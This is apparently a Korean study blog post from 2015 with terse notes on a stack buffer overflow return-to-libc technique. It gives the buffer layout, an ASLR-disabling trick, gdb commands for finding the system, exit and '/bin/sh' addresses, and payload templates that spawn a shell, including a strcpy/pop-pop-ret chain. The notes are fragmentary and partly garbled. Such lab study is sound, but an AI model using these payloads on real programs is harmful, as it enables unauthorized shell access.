Security Study/System

system 1일차

𝓛𝓾𝓬𝓮𝓽𝓮_𝓢𝓽𝓮𝓵𝓵𝓪 2015. 9. 12.

728x90

buf[248] + sfp[4] + ret

ulimit -s unlimited //스택크기를 무한정으로 늘려 ASLR이 적용안됨

system,execve - ebp+8위치에있는것을 인자로받음

buf[248] + sfp [4] + 조작(system) + AAAA + /bin/sh
- system("/bin/sh")

b main
r 1

p system - system주소 구하기
p exit - exit구하기
find &system,+9999999,"/bin/sh" - /bin/sh주소 구하기

./filename $(python -c 'print "A"*버퍼+sfp + system + exit + /bin/sh

strcpy(bss,\x80asda)
strcpy(bss,"b")

./filename buf+sfp + strcpy + poppopret + bss + / + strcpy + poppopret + bss + b
\x00... + system + AAAA + bss1

728x90

저작자표시

'Security Study > System' 카테고리의 다른 글

system /bin/sh 주소 찾기 (0)	2015.09.15
system 2 (0)	2015.09.13
system shellcode (0)	2015.09.10
BOF(buffer overflow) (0)	2015.09.03
카카오톡 비밀대화 분석 (0)	2015.09.03

system 1일차

'Security Study > System' 카테고리의 다른 글

댓글

티스토리툴바